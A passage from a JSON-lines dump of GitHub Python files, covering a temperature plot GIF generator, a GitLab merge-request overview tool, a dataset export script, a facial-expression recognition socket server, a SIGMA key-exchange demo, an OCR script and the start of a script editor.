plt.figure(figsize=self.fig_size, dpi=DPI)\n        gs = gridspec.GridSpec (ncols=2, nrows=1, width_ratios=[3, 1], bottom=0.15, top=0.85)\n        gs.update (top=0.8)\n\n        ## Left: Time-series plot\n        axis = fig.add_subplot(gs[0])\n        ylimits = [self.min_temp-5, self.max_temp+5]\n        yticks = np.linspace (ylimits[0], ylimits[1], N_YTICKS)\n        yticklabels = convert_defF_to_defC (yticks) if doMetric else yticks \n        ylabel = 'Temperature ({0})'.format (yunit)\n        self._plot_obs_time_series (axis, df, dot_time, ylimits, yticks, yticklabels, ylabel)\n        lgd = axis.legend (bbox_to_anchor=(0, 1, 1, 0), loc='lower right', fontsize=self._fontsize)\n        axis.set_title('Temperature', fontsize=self._fontsize*3, loc='left', pad=37)\n\n        ## Right: Thermometers\n        subgs = gs[1].subgridspec (2, 1, height_ratios=[1, 4])\n        axis = fig.add_subplot(subgs[1])\n        at_dot = df[df.index == dot_time].tail (1)\n        air_height = at_dot.air_height.values[0]\n        
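# Draw the air and water thermometers side by side at their dot-time heights\n        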
self._create_a_thermometer_on_main_axis (axis, air_height, yticks, isAir=True)\n        water_height = at_dot.water_height.values[0]\n        self._create_a_thermometer_on_main_axis (axis, water_height, yticks, isAir=False)\n\n        ## Format title / layout\n        plt.savefig(self._plot_path + '/' + dot_time.strftime ('%Y%m%d%H%M') + '.jpg',\n                    bbox_extra_artists=(lgd,), dpi=DPI)\n        \n        ## Properly close the window for the next plot\n        plt.close ('all')\n\n    def create_gif (self):\n\n        ## Make sure \"now\" time is set\n        if self._now is None:\n            raise IOError (\"Please define now time before creating gif.\")\n        \n        ## Remove everything in the plot path\n        if os.path.exists (self.plot_path):\n            all_files = glob.glob (self.plot_path + '/*.jpg')\n            for afile in all_files: os.remove (afile)\n\n        ## Gather data\n        self._load_data()\n\n        ## Generate each time step until the last observation point\n        ## Toggle from degF to degC and back every N frames\n        doMetric = True # Flipped on the first frame, so the gif starts in degF\n        end_time = self.latest_obs_time\n        timestamps = list (self._latest_data_df.iloc[::10, :].index) + [end_time]\n        for index, dot_time in enumerate (sorted (timestamps)):\n            # If there are no more valid observation points, exit the loop\n            if dot_time > end_time: break\n            # Toggle units\n            if index % self._toggle_units_freq == 0: doMetric = not doMetric\n            # Generate the plot for this time stamp\n            self._generate_one_plot (dot_time, doMetric=doMetric)\n\n        ## Create gif\n        self._make_gif()\n","repo_name":"NOAA-CO-OPS/digital-display","sub_path":"webapp/plotter/temperature.py","file_name":"temperature.py","file_ext":"py","file_size_in_byte":18704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"73878695505","text":"import traceback\nfrom typing import List\n\nfrom gitlab import Gitlab, GitlabHttpError\nfrom gitlab.v4.objects import ProjectMergeRequest\nfrom requests import Timeout\n\nfrom .config import GitlabMrsConfig, GitlabMrsConstants\nfrom ..common.util import abbreviate_string, time_ago, zulu_timestamp_string_to_datetime\nfrom ..pull_requests import PullRequestStatus, PullRequest, PullRequestsOverview, PullRequestException\n\n\ndef get_merge_requests_to_review(_author_id, _mrs):\n    mrs_and_overall_status = list()\n\n    for mr in _mrs:\n        if mr.author[\"id\"] != _author_id:\n            approvals = list(\n                filter(lambda approval: approval[\"user\"][\"id\"] == _author_id, mr.approvals.get().approved_by))\n\n            # Include the MR unless the user already approved it and\n            # OMIT_REVIEWED_AND_APPROVED is set\n            if len(approvals) == 0 or not GitlabMrsConfig.OMIT_REVIEWED_AND_APPROVED:\n                mrs_and_overall_status.append(get_overall_status(mr, _author_id))\n\n    return mrs_and_overall_status\n\n\ndef get_authored_merge_requests(_author_id, _mrs):\n    mrs_and_overall_status = list()\n\n    for mr in _mrs:\n        if mr.author[\"id\"] == _author_id:\n            mrs_and_overall_status.append(get_overall_status(mr, _author_id))\n\n    return mrs_and_overall_status\n\n\ndef get_overall_status(_mr, _author_id) -> (ProjectMergeRequest, PullRequestStatus):\n    has_unresolved_threads = mr_has_unresolved_threads(_mr, _author_id)\n    approved = mr_is_approved(_mr, _author_id)\n\n    if has_unresolved_threads and approved:\n        return _mr, PullRequestStatus.APPROVED_WITH_SUGGESTIONS\n    elif has_unresolved_threads:\n        return _mr, PullRequestStatus.NEEDS_WORK\n    elif approved:\n        return _mr, PullRequestStatus.APPROVED\n    else:\n        return _mr, PullRequestStatus.UNAPPROVED\n\n\ndef mr_has_unresolved_threads(_mr, _author_id) -> bool:\n    # Get the `resolved` attribute, and default to true if the attribute does 
not exist,\n # that way, we only get resolvable comments\n # We only want to keep the unresolved comments that are not yet resolved and are resolvable,\n # hence, we negate the attribute\n\n notes = _mr.notes.list()\n\n if _mr.author[\"id\"] == _author_id:\n unresolved_threads_by_others = list(\n filter(lambda note: not getattr(note, 'resolved', True) and note.author[\"id\"] != _author_id,\n notes))\n return len(unresolved_threads_by_others) > 0\n else:\n unresolved_threads_by_me = list(\n filter(lambda note: not getattr(note, 'resolved', True) and note.author[\"id\"] == _author_id,\n notes))\n return len(unresolved_threads_by_me) > 0\n\n\ndef mr_is_approved(_mr, _author_id) -> bool:\n approvals = _mr.approvals.get().approved_by\n\n if _mr.author[\"id\"] == _author_id:\n others_approvals = list(filter(lambda approval: approval[\"user\"][\"id\"] != _author_id, approvals))\n return len(others_approvals) > 0\n else:\n my_approval = list(filter(lambda approval: approval[\"user\"][\"id\"] == _author_id, approvals))\n return len(my_approval) == 1\n\n\ndef extract_pull_request_data(_raw_merge_requests) -> List[PullRequest]:\n merge_requests: List[PullRequest] = list()\n\n for mr, overall_status in _raw_merge_requests:\n pr_activity = zulu_timestamp_string_to_datetime(mr.updated_at)\n\n merge_requests.append(PullRequest(\n id=str(mr.iid),\n title=abbreviate_string(mr.title, GitlabMrsConfig.ABBREVIATION_CHARACTERS),\n slug=mr.references[\"full\"].replace(mr.references[\"short\"], \"\"),\n from_ref=mr.source_branch,\n to_ref=mr.target_branch,\n overall_status=overall_status,\n activity=pr_activity,\n time_ago=time_ago(pr_activity),\n all_prs_href=mr.web_url.replace(f\"/{mr.iid}\", \"\"),\n href=mr.web_url\n ))\n\n return merge_requests\n\n\ndef group_mrs(_gl):\n group = _gl.groups.get(GitlabMrsConfig.GROUP_NAME)\n\n all_open_mrs = group.mergerequests.list(state=\"opened\", all=True, wip=\"no\") if GitlabMrsConfig.OMIT_DRAFT else group.mergerequests.list(state=\"opened\", all=True)\n\n # Ensure we only keep MRs that have none of the labels in the exclusions list\n mrs = list(\n filter(\n lambda mr: len(GitlabMrsConfig.EXCLUDE_MRS_WITH_LABELS.intersection(mr.labels)) == 0, all_open_mrs\n )\n )\n\n projects_and_mrs = list()\n projects = dict()\n for mr in mrs:\n if mr.project_id in projects:\n project = projects[mr.project_id]\n else:\n project = _gl.projects.get(mr.project_id, lazy=True)\n projects[mr.project_id] = project\n\n projects_and_mrs.append(project.mergerequests.get(mr.iid))\n\n return projects_and_mrs\n\n\ndef get_merge_request_overview() -> PullRequestsOverview:\n _prs_to_review: List[PullRequest] = []\n _prs_authored_with_work: List[PullRequest] = []\n _exception = None\n\n _gl = Gitlab(url=GitlabMrsConfig.GITLAB_HOST, private_token=GitlabMrsConfig.PRIVATE_TOKEN)\n _gl.auth()\n _author_id = _gl.user.id\n\n mrs = group_mrs(_gl)\n\n try:\n _prs_to_review: List[PullRequest] = extract_pull_request_data(\n get_merge_requests_to_review(_author_id, mrs)\n )\n _prs_authored_with_work: List[PullRequest] = extract_pull_request_data(\n get_authored_merge_requests(_author_id, mrs)\n )\n except Timeout as e:\n _exception = PullRequestException(GitlabMrsConstants.MODULE, GitlabMrsConstants.TIMEOUT_MESSAGE, e,\n traceback.format_exc())\n except GitlabHttpError as e:\n _exception = PullRequestException(GitlabMrsConstants.MODULE, GitlabMrsConstants.CONNECTION_MESSAGE, e,\n traceback.format_exc())\n except Exception as e:\n _exception = PullRequestException(GitlabMrsConstants.MODULE, 
GitlabMrsConstants.UNKNOWN_MESSAGE, e,\n                                          traceback.format_exc())\n\n    return PullRequestsOverview.create(_prs_to_review, _prs_authored_with_work, _exception)\n","repo_name":"trietsch/xbar","sub_path":"src/python/gitlab_mrs/gitlab_mrs.py","file_name":"gitlab_mrs.py","file_ext":"py","file_size_in_byte":6103,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"}
+{"seq_id":"72115059346","text":"# This export works, need to filter by top labels\n\n# Training this dataset with Teachable Machine works fine, but I'm not too\n# happy with the categories.\n\n# Art media dataset works fine, but might need some pruning -- lots of pictures\n# Same for WikiArt\n\nimport fiftyone as fo\nimport fiftyone.zoo as foz\nfrom fiftyone import ViewField as F\n\ndataset = foz.load_zoo_dataset(\"caltech101\", max_samples=1000, shuffle=True)\n\nexport_dir = \"caltech101_dataset/\"\nlabel_field = \"ground_truth\"  # for example\n\nview = dataset.filter_labels(\"ground_truth\", (F(\"label\") == \"Motorbikes\") | \n                                              (F(\"label\") == \"airplanes\") |\n                                              (F(\"label\") == \"Faces\") |\n                                              (F(\"label\") == \"butterfly\") |\n                                              (F(\"label\") == \"sunflower\"))\n\n# view = dataset.filter_labels(\"ground_truth\", (F(\"label\") == \"Motorbikes\") | \n#                                               (F(\"label\") == \"airplanes\") |\n#                                               (F(\"label\") == \"Faces\") |\n#                                               (F(\"label\") == \"watch\") |\n#                                               (F(\"label\") == \"Leopards\") |\n#                                               (F(\"label\") == \"chandelier\") |\n#                                               (F(\"label\") == \"butterfly\") |\n#                                               (F(\"label\") == \"sunflower\") |\n#                                               (F(\"label\") == \"kangaroo\") |\n#                                               (F(\"label\") == \"laptop\") |\n#                                               (F(\"label\") == \"BACKGROUND_Google\"))\n\n# Export the dataset\nview.export(\n    export_dir=export_dir,\n    dataset_type=fo.types.ImageClassificationDirectoryTree,\n    label_field=label_field\n)","repo_name":"tiagosousagarcia/jumpstart-tutorials","sub_path":"prep-image-categorization/export_dataset_caltech.py","file_name":"export_dataset_caltech.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"8133783688","text":"#!/usr/bin/env python\n# -*-coding:utf-8-*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport cv2\nimport tensorflow as tf\nimport numpy as np\nimport os\nfrom socket import *\nfrom select import *\nimport sys\nfrom time import ctime\n\"\"\" -------------------------------------------------------------\n### Facial Expression Recognition Server\n### ------------------------------------------------------------- \"\"\"\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\nflags.DEFINE_integer('test_size', 1, 'test_batch_size')\nflags.DEFINE_integer('NoC', 4, 'the number of classes')\nflags.DEFINE_string('root', '/media/austin/D_drive/Embedded/', 'root directory for training')\nflags.DEFINE_string('ckpt', 'model/vgg_SGD/', 'ckpt directory')\n\nsvPath = '/media/austin/D_drive/Embedded/Test/'\nHOST = ''\nPORT = 9055\nBUFSIZE = 1024\nADDR = (HOST, PORT)\n\n# make socket object\nserverSocket = socket(AF_INET, SOCK_STREAM)\n\n# bind server information\nserverSocket.bind(ADDR)\n\n# waiting request\nserverSocket.listen(10)\nconnection_list = [serverSocket]\n\ndef hom(img):\n    rows = img.shape[0]\n    cols = img.shape[1]\n\n    imgLog = np.log1p(np.array(img, dtype=\"float\") / 255)\n\n    M = 2 * rows + 1\n    N = 2 * cols + 1\n    sigma = 10\n    (X, Y) = np.meshgrid(np.linspace(0, N - 1, N), np.linspace(0, M - 1, M))\n    Xc = np.ceil(N / 2)\n    Yc = np.ceil(M / 2)\n    gaussianNumerator = (X - Xc) ** 2 + (Y - Yc) ** 2\n\n    LPF = np.exp(-gaussianNumerator / (2 * sigma * sigma))\n    HPF = 1 - LPF\n\n    LPF_shift = np.fft.ifftshift(LPF.copy())\n    HPF_shift = np.fft.ifftshift(HPF.copy())\n\n    img_FFT = np.fft.fft2(imgLog.copy(), (M, N))\n    img_LF = np.real(np.fft.ifft2(img_FFT.copy() * LPF_shift, (M, N)))\n    img_HF = np.real(np.fft.ifft2(img_FFT.copy() * HPF_shift, (M, N)))\n\n    gamma1 = 0.3\n    gamma2 = 1.5\n    img_adjusting = gamma1*img_LF[0:rows, 0:cols] + gamma2*img_HF[0:rows, 0:cols]\n\n    img_exp = np.expm1(img_adjusting)\n    img_exp = (img_exp - np.min(img_exp)) / (np.max(img_exp) - np.min(img_exp))\n    img_out = np.array(255 * img_exp, dtype=\"uint8\")\n\n    return img_out\n\ndef init_weights(shape, name):\n    return tf.Variable(tf.random_normal(shape, stddev=0.01), name = name)\n\ndef batch_norm(x, n_out):\n    with tf.variable_scope('bn'):\n        beta = tf.Variable(tf.zeros([n_out]),\n                           name='beta', trainable=True)\n        gamma = tf.Variable(tf.ones([n_out]),\n                            name='gamma', trainable=True)\n\n        batch_mean, batch_var = tf.nn.moments(x, [0,1,2], name='moments')\n\n        ema = tf.train.ExponentialMovingAverage(decay=0.5)\n\n        def mean_var_with_update():\n            ema_apply_op = ema.apply([batch_mean, batch_var])\n            with tf.control_dependencies([ema_apply_op]):\n                return tf.identity(batch_mean), tf.identity(batch_var)\n\n        mean, var = tf.cond(tf.less(tf.constant(5), tf.constant(2)), mean_var_with_update,\n                            lambda:(ema.average(batch_mean), ema.average(batch_var)))\n        normed = tf.nn.batch_normalization(x, mean, var, beta, gamma, 1e-3)\n    return normed\n\ndef model(X, w1a, w1b, w2a, w2b, w3a, w3b, w3c, w3d, w4a, w4b, w4c, w4d, w5a, w5b, w5c, w5d, w6a, w6b, w_o):\n    conv1a = 
tf.nn.conv2d(X, w1a, strides=[1, 1, 1, 1], padding='SAME') # conv1 shape=(?, width, height, kernels) // 224,224, 64\n    conv1a_bn = batch_norm(conv1a, 64)\n    conv1a_out = tf.nn.relu(conv1a_bn)\n    conv1b = tf.nn.conv2d(conv1a_out, w1b, strides=[1, 1, 1, 1], padding='SAME')\n    conv1b_bn = batch_norm(conv1b, 64)\n    conv1b_out = tf.nn.relu(conv1b_bn)\n    pool1 = tf.nn.max_pool(conv1b_out, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') # pool1 shape=(?, width, height, kernels) // 112, 112, 64\n\n\n    conv2a = tf.nn.conv2d(pool1, w2a, strides=[1, 1, 1, 1], padding='SAME') # 112,112,128\n    conv2a_bn = batch_norm(conv2a, 128)\n    conv2a_out = tf.nn.relu(conv2a_bn)\n    conv2b = tf.nn.conv2d(conv2a_out, w2b, strides=[1, 1, 1, 1], padding='SAME') # 112,112,128\n    conv2b_bn = batch_norm(conv2b, 128)\n    conv2b_out = tf.nn.relu(conv2b_bn)\n    pool2 = tf.nn.max_pool(conv2b_out, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') #56,56,128\n\n    conv3a = tf.nn.conv2d(pool2, w3a, strides=[1, 1, 1, 1], padding='SAME') # 56,56,256\n    conv3a_bn = batch_norm(conv3a, 256)\n    conv3a_out = tf.nn.relu(conv3a_bn)\n    conv3b = tf.nn.conv2d(conv3a_out, w3b, strides=[1, 1, 1, 1], padding='SAME')\n    conv3b_bn = batch_norm(conv3b, 256)\n    conv3b_out = tf.nn.relu(conv3b_bn)\n    conv3c = tf.nn.conv2d(conv3b_out, w3c, strides=[1, 1, 1, 1], padding='SAME')\n    conv3c_bn = batch_norm(conv3c, 256)\n    conv3c_out = tf.nn.relu(conv3c_bn)\n    conv3d = tf.nn.conv2d(conv3c_out, w3d, strides=[1, 1, 1, 1], padding='SAME')\n    conv3d_bn = batch_norm(conv3d, 256)\n    conv3d_out = tf.nn.relu(conv3d_bn)\n    pool3 = tf.nn.max_pool(conv3d_out, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') # 28,28,256\n\n    conv4a = tf.nn.conv2d(pool3, w4a, strides=[1, 1, 1, 1], padding='SAME') #28,28,512\n    conv4a_bn = batch_norm(conv4a, 512)\n    conv4a_out = tf.nn.relu(conv4a_bn)\n    conv4b = tf.nn.conv2d(conv4a_out, w4b, strides=[1, 1, 1, 1], padding='SAME')\n    conv4b_bn = batch_norm(conv4b, 512)\n    conv4b_out = tf.nn.relu(conv4b_bn)\n    conv4c = tf.nn.conv2d(conv4b_out, w4c, strides=[1, 1, 1, 1], padding='SAME')\n    conv4c_bn = batch_norm(conv4c, 512)\n    conv4c_out = tf.nn.relu(conv4c_bn)\n    conv4d = tf.nn.conv2d(conv4c_out, w4d, strides=[1, 1, 1, 1], padding='SAME')\n    conv4d_bn = batch_norm(conv4d, 512)\n    conv4d_out = tf.nn.relu(conv4d_bn)\n    pool4 = tf.nn.max_pool(conv4d_out, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') #14,14,512.\n\n    conv5a = tf.nn.conv2d(pool4, w5a, strides=[1, 1, 1, 1], padding='SAME') # 14,14,512\n    conv5a_bn = batch_norm(conv5a, 512)\n    conv5a_out = tf.nn.relu(conv5a_bn)\n    conv5b = tf.nn.conv2d(conv5a_out, w5b, strides=[1, 1, 1, 1], padding='SAME')\n    conv5b_bn = batch_norm(conv5b, 512)\n    conv5b_out = tf.nn.relu(conv5b_bn)\n    conv5c = tf.nn.conv2d(conv5b_out, w5c, strides=[1, 1, 1, 1], padding='SAME')\n    conv5c_bn = batch_norm(conv5c, 512)\n    conv5c_out = tf.nn.relu(conv5c_bn)\n    conv5d = tf.nn.conv2d(conv5c_out, w5d, strides=[1, 1, 1, 1], padding='SAME')\n    conv5d_bn = batch_norm(conv5d, 512)\n    conv5d_out = tf.nn.relu(conv5d_bn)\n    pool5 = tf.nn.max_pool(conv5d_out, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') #7,7,512\n\n########### Dense Layer\n    dense1 = tf.nn.conv2d(pool5, w6a, strides=[1, 1, 1, 1], padding='VALID') # 1, 1, 4096\n    dense1_bn = batch_norm(dense1, 4096)\n    dense1_out = tf.nn.relu(dense1_bn)\n\n    dense2 = tf.nn.conv2d(dense1_out, w6b, strides=[1, 1, 1, 1], padding='SAME') # 1, 1, 4096\n    dense2_bn = batch_norm(dense2, 4096)\n    dense2_out = tf.nn.relu(dense2_bn)\n\n    dense3 = tf.nn.conv2d(dense2_out, w_o, strides=[1, 1, 1, 
1], padding='SAME') # 1, 1, 4\n    dense3_bn = batch_norm(dense3, FLAGS.NoC)\n    dense3_out = tf.nn.relu(dense3_bn)\n    # print(dense1_out.get_shape().as_list())\n    pyx = tf.reshape(dense3_out, [-1, FLAGS.NoC])\n\n    return pyx\n\n### set tensors\nX = tf.placeholder(\"float\", [None, 224, 224, 1], name='X')\nY = tf.placeholder(\"float\", [None, FLAGS.NoC], name='Y')\n\nw1a = init_weights([3, 3, 1, 64], 'w1a') # 3x3x1 conv, 64 outputs\nw1b = init_weights([3, 3, 64, 64], 'w1b')\nw2a = init_weights([3, 3, 64, 128], 'w2a')\nw2b = init_weights([3, 3, 128, 128], 'w2b')\nw3a = init_weights([3, 3, 128, 256], 'w3a')\nw3b = init_weights([3, 3, 256, 256], 'w3n')\nw3c = init_weights([3, 3, 256, 256], 'w3c')\nw3d = init_weights([3, 3, 256, 256], 'w3d')\nw4a = init_weights([3, 3, 256, 512], 'w4a')\nw4b = init_weights([3, 3, 512, 512], 'w4b')\nw4c = init_weights([3, 3, 512, 512], 'w4c')\nw4d = init_weights([3, 3, 512, 512], 'w4d')\nw5a = init_weights([3, 3, 512, 512], 'w5a')\nw5b = init_weights([3, 3, 512, 512], 'w5b')\nw5c = init_weights([3, 3, 512, 512], 'w5c')\nw5d = init_weights([3, 3, 512, 512], 'w5d')\nw6a = init_weights([7, 7, 512, 4096], 'w6a')\nw6b = init_weights([1, 1, 4096, 4096], 'w6b')\nw_o = init_weights([1, 1, 4096, FLAGS.NoC], 'w_o')\n\npy_x = model(X, w1a, w1b, w2a, w2b, w3a, w3b, w3c, w3d,\n             w4a, w4b, w4c, w4d, w5a, w5b, w5c, w5d, w6a, w6b, w_o)\n\npredict_op = tf.argmax(py_x, 1)\n\nsaver = tf.train.Saver()\n\nwith tf.Session() as sess :\n    saver.restore(sess, FLAGS.root + FLAGS.ckpt)\n    print('model restored')\n\n    coord = tf.train.Coordinator()\n    threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n\n    i=0\n    while connection_list:\n\n        try:\n            print('[INFO] Waiting Request...')\n\n            # get request by select, release blocking step by 10 seconds\n            read_socket, write_socket, error_socket = select(connection_list, [], [], 10)\n\n            for sock in read_socket:\n                # new connection\n                if sock == serverSocket:\n                    clientSocket, addr_info = serverSocket.accept()\n                    connection_list.append(clientSocket)\n\n                    print('[INFO][%s] new client(%s) is connected.' % (ctime(), addr_info[0]))\n\n                    # response to client\n                    for socket_in_list in connection_list:\n                        if socket_in_list != serverSocket and socket_in_list != sock:\n                            try:\n                                f = open(FLAGS.root+'Test/abc%d.jpg'%i, 'wb')\n                                print('start receiving data...')\n                            except Exception as e:\n                                print('error1')\n                                socket_in_list.close()\n                                connection_list.remove(socket_in_list)\n\n                # getting new data from connected client\n                else:\n\n                    image = sock.recv(BUFSIZE + 1)\n                    if image:\n                        print('[INFO][%s] Receive data from client.' % ctime())\n                        print ('data_size :', len(image))\n\n                        if image[-2:] == b'aa': # sock.recv returns bytes under Python 3\n                            f.write(image[:-6])\n                            f.close()\n                            print(\"start prediction\")\n                            im = cv2.imread(FLAGS.root + 'Test/abc%d.jpg'%i, 0)\n                            # cv2.imshow(\"tmp\", im)\n                            homed = hom(im)\n                            blurred = cv2.GaussianBlur(homed, (3, 3), 0)\n                            eq = cv2.equalizeHist(blurred)\n                            a = eq.reshape(-1, 224, 224, 1)\n                            result = sess.run(predict_op, feed_dict={X: a})\n                            if result[0] == 0:\n                                exp = 'Anger'\n\n                            elif result[0] == 1:\n                                exp = 'Happy'\n                            elif result[0] == 2:\n                                exp = 'Neutral'\n                            else:\n                                exp = 'Sadness'\n                            print('[test_decision : ', exp, ']')\n                            print('send signal')\n                            socket_in_list.send(exp.encode())\n                        else:\n                            f.write(image)\n                            print('receiving data.....')\n\n                    else:\n                        i += 1\n                        connection_list.remove(sock)\n                        sock.close()\n                        print('[INFO][%s] connect is closed.' 
% ctime())\n                        # os.remove(svPath + 'abc.jpg')\n        except KeyboardInterrupt:\n            # exit smoothly\n            serverSocket.close()\n            sys.exit()\n\n    coord.request_stop()\n    coord.join(threads)","repo_name":"moon920110/Facial_Expression_Recognition","sub_path":"Embedded_Facial_server.py","file_name":"Embedded_Facial_server.py","file_ext":"py","file_size_in_byte":11826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
+{"seq_id":"8493501246","text":"from Party import *\n\n# Instantiate Party class objects as parties A and B with the given identities\nA=Party()\nB=Party()\n\n# STEP 1 = A sends to B\nB.opponent_dh_exponential = A.dh_exponential # Its public DH key\n\n# STEP 2 = B sends to A\nA.opponent_dh_exponential = B.dh_exponential # B sends A its public DH key\n\nA.opponent_identity = B.identity # B sends A its identity (raw)\n\nB.generateSignChallenge() # B generates a challenge for A - a signature over the public DH keys\nA.opponent_sign_challenge = B.sign_challenge # B sends A the signature challenge\n\n# COMPUTING THE SHARED KEYS\nA.generateSharedKey() # Since both sides hold the opponent's public DH key and their own private key,\nB.generateSharedKey() # they derive the shared key from them\n\nB.generateIdentityMAC() # B computes the MAC of its identity from the shared key\nA.generateIdentityMAC() # A computes the MAC of its identity from the shared key (not needed yet at this step)\nA.opponent_identity_mac = B.identity_mac # B sends A the computed identity MAC\n\n# STEP 3 = A sends to B\nB.opponent_identity = A.identity # A sends B its identity (raw)\n\nA.generateSignChallenge() # A generates a challenge for B - a signature over the public DH keys\nB.opponent_sign_challenge = A.sign_challenge # A sends B the signature challenge\n\nB.opponent_identity_mac = 
A.identity_mac # A sends B the MAC computed over its identity\n\n# CONSISTENCY VERIFICATIONS\nprint(\"Validity of the signature from B:\t\t\t\t\",A.verifySignChallenge(A.opponent_identity)) # A verifies the signature from B\nprint(\"MAC generated in A matches the one from B:\t\", A.verifyOpposingMAC()) # A computes the MAC itself and checks it against the received one\nprint(\"Validity of the signature from A:\t\t\t\t\",B.verifySignChallenge(B.opponent_identity)) # B verifies the signature from A\nprint(\"MAC generated in B matches the one from A:\t\", B.verifyOpposingMAC()) # B computes the MAC itself and checks it against the received one\nprint(\"Shared keys are equal:\t\t\",A.shared_key==B.shared_key) # Finally the computed shared keys are checked for equality\nprint(\"If all verifications passed - the shared key is valid\")\n# If every line prints true, the SIGMA protocol exchange succeeded","repo_name":"itsbudyn/krypto-projekt","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"18378460453","text":"import json\nimport cv2\nimport os\nimport time\nimport tesserocr\nfrom tesserocr import PyTessBaseAPI\n\ndef new_recognition(images):\n\n    for image in images:\n        # Check if the json already exists\n        index = image.find('.')\n        jsonfile = image[:index] + '_NEW.json'\n        exists = os.path.isfile(jsonfile)\n        if not exists:\n            # Call text_detection.py and return coordinates found in boxes.json\n            call = 'python opencv-text-detection\\\\text_detection.py --image ' + image + ' --east opencv-text-detection\\\\frozen_east_text_detection.pb'\n            os.system(call)\n\n            # Extract coordinates from boxes.json\n            startX, startY, endX, endY = [], [], [], []\n            boxesfile = image[:index] + '_BOXES.json'\n            with open(boxesfile, 'r') as file:\n                data = json.load(file)\n                for box in data['boxes']:\n                    startX.append(box['startX'])\n                    startY.append(box['startY'])\n                    endX.append(box['endX'])\n                    endY.append(box['endY'])\n\n            # Find the biggest box\n            newStartX = min(startX)\n            newStartY = min(startY)\n            newEndX = max(endX)\n            newEndY = max(endY)\n\n            # Crop image given box\n            img = cv2.imread(image)\n            crop_img = img[newStartY:newEndY, newStartX:newEndX]\n            crop_image = image[:index] + '_CROPPED.jpg'\n            cv2.imwrite(crop_image, crop_img)\n\n            # Send box to tesserocr\n            #print(tesserocr.tesseract_version())\n            #print(tesserocr.get_languages())\n            with tesserocr.PyTessBaseAPI(path='C:\\\\Users\\\\ale19\\\\AppData\\\\Local\\\\Tesseract-OCR\\\\tessdata') as api:\n                api.SetImageFile(image)\n                text = api.GetUTF8Text()\n\n            # Save words found in image_name.json\n            words = text.split()\n            data = {}\n            data['words'] = []\n            if not words:\n                data['words'].append(' ')\n            for word in words:\n                data['words'].append(word)\n            with open(jsonfile, 'w') as file:\n                json.dump(data, file, sort_keys = True, indent = 4)\n\n            # Remove cropped image from folder\n            time.sleep(1)\n            os.remove(crop_image)\n\n        print('Recognition ended for {}\n'.format(image))\n","repo_name":"alessiabodini/WineBottlesRecognition","sub_path":"new_recognition.py","file_name":"new_recognition.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"}
+{"seq_id":"28882749055","text":"#! /usr/bin/env python3.0\n\"\"\"\neditor.py - OGRE Script Editor.\n\nDescription:\n    This is an interactive tool for building test script snippets. 
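It connects to a process at a TCP URL, sends and receives signals, and records each action in the script window, from which the generated script can be saved. 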
\n\nUsage:\n editor.py [<signal_file> ...]\n\n\"\"\"\nimport copy\nimport imp\nimport os.path\nimport sys\nimport tkinter\nimport tkinter.font\nfrom tkinter.filedialog import askopenfilename\nfrom tkinter.filedialog import asksaveasfilename\n\nimport ogre\n\n\nBG_COLOR = \"lightsteelblue\"\nFIELD_COLOR = \"lightblue\"\nFRAME_COLOR = \"lightsteelblue\"\nBUTTON_COLOR = \"lightblue\"\nHEADER_COLOR = \"steelblue\"\n\nSTICKY_ALL = tkinter.N + tkinter.S + tkinter.W + tkinter.E\n\n# ----------------------------------------------------------------\nclass Int:\n \"\"\"\n Represents an integer in a signal.\n \"\"\"\n def __init__(self, parent, name, obj, i):\n self.name = name\n self.obj = obj\n\n self.value_entry = tkinter.Entry(parent, bg=FIELD_COLOR)\n self.value_entry.insert(0, obj)\n self.value_entry.grid(row=i, column=1, sticky=tkinter.W)\n\n def value(self):\n val = int(self.value_entry.get())\n self.obj = val\n return val\n\n def as_string(self, prefix):\n val = int(self.value_entry.get())\n if val != self.obj:\n return \"%s = %d\\n\" % (prefix, self.value())\n return \"\"\n \n def as_verify_string(self, prefix):\n return \"assert(%s == %d)\\n\" % (prefix, self.value())\n\n\n# ----------------------------------------------------------------\nclass Array:\n \"\"\"\n Represents an array in a signal.\n \"\"\"\n def __init__(self, parent, name, array, i):\n self.name = name\n self.array = array\n self.tree = []\n\n frame = tkinter.Frame(parent, relief=tkinter.GROOVE, bd=2, bg=FRAME_COLOR)\n frame.grid(row=i, column=1, sticky=tkinter.W)\n\n length = len(array)\n for k in range(length):\n attr_name = \"[%d]\" % k\n attr = array[k]\n\n value_label = tkinter.Label(frame, bg=FRAME_COLOR,\n text=\"%d:\" % k)\n value_label.grid(row=k, column=0, sticky=tkinter.E)\n if isinstance(attr, ogre.Struct):\n item = Struct(frame, attr_name, attr, k)\n else:\n item = Int(frame, attr_name, attr, k)\n self.tree.append(item)\n\n def value(self):\n for k, item in enumerate(self.tree):\n self.array[k] = item.value()\n return self.array\n\n def as_string(self, prefix):\n s = \"\"\n for item in self.tree:\n s = s + item.as_string(prefix + item.name)\n return s\n\n def as_verify_string(self, prefix):\n s = \"\"\n for item in self.tree:\n s = s + item.as_verify_string(prefix + item.name)\n return s\n\n# ----------------------------------------------------------------\nclass Struct:\n \"\"\"\n Represents a struct in a signal.\n \"\"\"\n def __init__(self, parent, name, struct, i):\n self.name = name\n self.struct = struct\n self.tree = []\n\n frame = tkinter.Frame(parent, relief=tkinter.GROOVE, bd=2, bg=FRAME_COLOR)\n frame.grid(row=i, column=1, sticky=tkinter.W)\n\n j = 0\n for attr_name in struct.attributes():\n if attr_name == 